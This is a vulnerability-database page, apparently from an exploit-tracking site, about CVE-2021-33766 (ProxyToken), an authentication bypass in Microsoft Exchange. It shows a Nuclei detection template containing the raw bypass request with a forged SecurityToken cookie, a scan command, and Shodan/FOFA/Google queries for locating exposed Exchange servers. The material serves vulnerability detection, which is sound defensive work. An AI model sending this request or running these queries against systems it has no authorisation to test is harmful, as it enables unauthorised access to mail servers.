Skip to content
Appaloosa Scout
Language selector
fr en

Materialized exploit

CVE-2021-33766

HIGH KEV

1 public exploit(s) for this CVE, 1 materialized with their code.

For defensive research only. Only test on systems you own or have written authorization for. Unauthorized access is illegal.
Nuclei high Verified
Source

Microsoft Exchange - Authentication Bypass

By projectdiscovery

How to test this exploit

The Nuclei template IS the test: an executable detection rule. Install nuclei, then run it against a target you control.

nuclei -id CVE-2021-33766 -u https://your-target

Template yaml

id: CVE-2021-33766

info:
  name: Microsoft Exchange - Authentication Bypass
  author: daffainfo
  severity: high
  description: |
    Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal.
  impact: |
    Unauthenticated attackers can bypass authentication using a SecurityToken cookie, gaining access to Exchange Server's internal API endpoints and sensitive information.
  remediation: |
    Apply security updates provided by Microsoft to fix the authentication bypass vulnerability.
  reference:
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33766
    - https://www.zerodayinitiative.com/advisories/ZDI-21-798/
    - https://github.com/demossl/CVE-2021-33766-ProxyToken
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33766
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2021-33766
    epss-score: 0.98136
    epss-percentile: 0.9991
    cwe-id: NVD-CWE-noinfo
    cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query:
      - vuln:cve-2021-26855
      - http.favicon.hash:1768726119
      - http.title:"outlook"
      - cpe:"cpe:2.3:a:microsoft:exchange_server"
    fofa-query:
      - title="outlook"
      - icon_hash=1768726119
    google-query: intitle:"outlook"
  tags: cve,cve2021,microsoft,exchange,auth-bypass,kev,vkev,vuln

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        GET /ecp/{{email}}/PersonalSettings/HomePage.aspx?showhelp=false HTTP/1.1
        Host: {{Hostname}}
        Cookie: SecurityToken=x

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<span id="msgCode">403</span>'
          - 'function signOut() {'
        condition: and

      - type: word
        part: header
        words:
          - "Microsoft.Exchange.Data.Storage.ObjectNotFoundException"
          - "X-BEResource="
        condition: and

      - type: status
        status:
          - 403
# digest: 490a0046304402205b39176ea4a69df8833c843b213726875bfae0626120f0cd801d946b0e4e475102204267ebacc4cdb32840cf6d1aa4343dae07d9710ffc64d0a511ee46a60830de28:922c64590222798bb761d5b6d8e72950